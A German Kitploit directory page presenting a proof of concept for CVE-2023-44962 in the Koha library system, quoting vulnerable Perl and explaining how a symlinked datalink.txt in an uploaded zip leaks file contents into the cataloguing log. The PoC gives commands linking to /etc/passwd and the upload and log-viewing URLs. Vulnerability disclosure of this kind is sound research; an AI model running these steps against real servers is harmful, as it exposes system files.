Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Links.a — PoC für CVE-2023-44962 | Kitploit
Tools/GitHubGitHub/ladydarwe/links.a
SchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationFehlkonfiguration
GitHubladydarwe/links.a

Links.a

PoC für CVE-2023-44962

Repository anzeigen
1vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-44962

PoC für CVE-2023-44962

Analyse

Das Hochladen von Archivdateien, die symbolische Links enthalten, über upload-cover-image.pl kann einen Teil des Inhalts der verlinkten Dateien preisgeben.

root@kitploit:~
...
foreach my $dir (@directories) {
  my $file;
  if ( -e "$dir/idlink.txt" ) {
      $file = "$dir/idlink.txt";
  }
  elsif ( -e "$dir/datalink.txt" ) {
      $file = "$dir/datalink.txt";
  }
  else {
      next;
  }
  if ( open( my $fh, '<', $file ) ) {
      while ( my $line = <$fh> ) {
          my $delim =
              ( $line =~ /\t/ ) ? "\t"
            : ( $line =~ /,/ )  ? ","
            :                     "";

          unless ( $delim eq "," || $delim eq "\t" ) {
              warn
  "Unrecognized or missing field delimeter. Please verify that you are using either a ',' or a 'tab'";
              $error = 'DELERR';
          }
          else {
              ( $biblionumber, $filename ) = split $delim, $line, 2;
              $biblionumber =~
                s/[\"\r\n]//g;    # remove offensive characters
              $filename =~ s/[\"\r\n]//g;
              $filename =~ s/^\s+//;
              $filename =~ s/\s+$//;
              if (C4::Context->preference("CataloguingLog")) {
                  logaction('CATALOGUING', 'MODIFY', $biblionumber, "biblio cover image: $filename");
              }
...

Aus dem Code ist ersichtlich, dass, wenn die extrahierte Datei idlink. txt oder datalink. txt enthält, der Dateiinhalt gelesen und anhand von , oder \t aufgeteilt wird. Der hintere Teil des Inhalts wird der Variablen $filename zugewiesen, und wenn das Attribut CataloguingLog aktiviert ist (Standard: aktiviert), wird $filename protokolliert.

Beim Zugriff auf viewlog.pl kann der preisgegebene Dateiinhalt eingesehen werden.

PoC

Erstellen Sie zunächst eine Archivdatei:

root@kitploit:~
ln -s /etc/passwd datalink.txt
zip --symlinks datalink.zip datalink.txt

Rufen Sie dann die folgende URL auf, um datalink.zip hochzuladen:

root@kitploit:~
http://koha_ip:intranet_port/cgi-bin/koha/tools/upload-cover-image.pl

Der Antwortcode ist 500.

Rufen Sie dann die folgende URL auf, um den Dateiinhalt zu lesen:

root@kitploit:~
http://192.168.176.139:8081/cgi-bin/koha/tools/viewlog.pl
Tool herunterladen